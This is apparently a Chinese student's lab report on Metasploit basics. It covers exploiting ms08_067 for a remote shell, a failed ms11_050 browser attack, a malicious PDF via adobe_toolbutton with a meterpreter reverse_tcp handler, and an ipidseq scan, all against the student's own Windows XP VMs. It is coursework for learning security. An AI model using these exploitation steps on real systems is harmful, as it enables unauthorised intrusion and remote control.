《网络对抗技术》Exp5 MSF基础应用

  1. 一个主动攻击实践(ms08_067)
  2. 一个针对浏览器的攻击(ms11_050)
  3. 一个针对客户端的攻击(adobe_toolbutton)
  4. 成功应用任何一个辅助模块(ipidseq)(唯一)

实验目的

掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路

返回目录

实验环境:

  • 靶机1:Windows XP Professional SP2
  • 靶机2:Windows XP vivian SP3 简体中文

基础问题:

用自己的话解释什么是 exploit , payload , encode 。

  1. exploit:利用漏洞,达到攻击控制受害机的一种手段。
  2. payload:载荷,含有执行攻击的代码,攻击者进行攻击的“武器”。
  3. encode:对攻击代码进行伪装,使得shellcode改变形状。使其能正常运行并尽量免杀。

返回目录

1、主动攻击:ms08_067

  • 使用靶机1和Kali
  • msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块

  • 用show targets查看可以被攻击的靶机的操作系统型号:

  • 用show payloads查看可以供我们使用的攻击载荷:

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

  • 用show options查看需要设置的参数

  • 设置RHOST(靶机IP)和LHOST(Kali的IP):

  • 设置target选项目标(我攻击的系统为WIN xp 中文简体 SP2,所以选择9)

  • 确认参数设置无误后,用exploit指令开始攻击:

  • 攻击成功后会获取靶机的shell,可以对其进行操作:

返回目录

2、针对浏览器的攻击:ms11_050

  • 使用靶机2和Kali:用search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:
  • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版):

  • 用set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

用show options确认需要设置的参数是否已经设置好。

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

  • 在靶机IE上输入该网址

  • kali中显示session 1已经创建,并显示其会话ID

然而实验2还是失败了 XP系统的IE浏览器已经崩掉了

返回目录

3、针对客户端的攻击:adobe_toolbutton

  • 使用靶机2和Kali:用search adobe查询一下针对该漏洞的攻击模块:

  • 选择一个模块并使用该模块:

  • 用show targets查看可以被攻击的靶机的操作系统型号

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp

  • 用show options查看需要设置的参数:

  • 设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个gapziyun.pdf文件:

  • 如果在kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到

  • 将pdf文件粘贴到靶机win xp

  • 在kali中打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

  • 在靶机上打开刚刚那个pdf文件可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

返回目录

4、成功应用任何一个辅助模块:ipidseq

  • ipidseq
    功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  • 用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

  • 也可以对指定网段的主机进行扫描:

返回目录

实验中遇到的问题

 第二个任务的时候网页一直崩溃,尝试了如下的方法解决:

1.将其加入信任站点(失败

2.对Internet进行重新设置。将杀毒防御功能关闭(无效)

总结一下:可能是攻击程序太经典了。IE已经能检测到此漏洞

返回目录

实验总结与体会

1.通过这次实验基本掌握了msf渗透攻击的“套路”,search 查看漏洞信息,show targets 查看可以攻击的系统,show payloads 选择合适的载荷 ,show options 查看需要修改那些属性,info查看各种详细信息,最后反弹链接shell,只要找到合适的靶机,合适的版本,按流程下来基本都可以解决。

2.实验过程中,失败很多次,其实心态差点爆炸,但是仔细一想网络攻防失败是正常的。静下心来完成了之前剩下的实验。整个实验做完了,感受的是网络攻防过程,而不是那个结果。

返回目录

2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. 用juery的ajax方法调用aspx.cs页面中的webmethod方法

    首先在 aspx.cs文件里建一个公开的静态方法,然后加上WebMethod属性. 如: [WebMethod] public static string GetUserName() { //.... ...

  2. (三)Java工程化--Git起步

    GIT学习参考:https://git-scm.com/book/zh/v2 版本控制 版本控制记录了一个或若干文件的历史变化,便于今后查阅,恢复. 三类版本控制系统 本地版本控制系统 RCS : 本 ...

  3. POJ 2031 Building a Space Station (计算几何+最小生成树)

    题目: Description You are a member of the space station engineering team, and are assigned a task in t ...

  4. Revit二次开发之获得项目族预览图

    using Autodesk.Revit.UI; using Autodesk.Revit.DB; using Autodesk.Revit.Attributes; using System.Wind ...

  5. 网络编程中select模型和poll模型学习(linux)

    一.概述 并发的网络编程中不管是阻塞式IO还是非阻塞式IO,都不能很好的解决同时处理多个socket的问题.操作系统提供了复用IO模型:select和poll,帮助我们解决了这个问题.这两个函数都能够 ...

  6. 在普通js文件里引入vue实例的方法

    首先是我是写了一个 Loading 插件然后 是挂在打vue.prototype 原型上的. 在main.js中use使用了这个插件. 至此vue原型是就被我挂上 $loadding方法了. 然后我想 ...

  7. Java Spring Boot VS .NetCore (十) Java Interceptor vs .NetCore Interceptor

    Java Spring Boot VS .NetCore (一)来一个简单的 Hello World Java Spring Boot VS .NetCore (二)实现一个过滤器Filter Jav ...

  8. 纯css画直角三角形

    所有的三角形,都是通过盒子模型来设定. border(边框)的不同大小来决定 border-width: 边框的宽度 border-style: 边框的样式 border-color: 边框的颜色 1 ...

  9. UIWebView的常用方法

    //webview导航栏类型enum UIWebViewNavigationType : Int { case LinkClicked case FormSubmitted case BackForw ...

  10. Linux远程登录ssh免密码配置方法(仅供参考)

    这篇文章主要介绍了linux远程登录ssh免密码配置方法,需要的朋友可以参考下(http://www.0834-3659999.com) 一.情景 公司刚上几台Linux,现在要把主机之间都能远程ss ...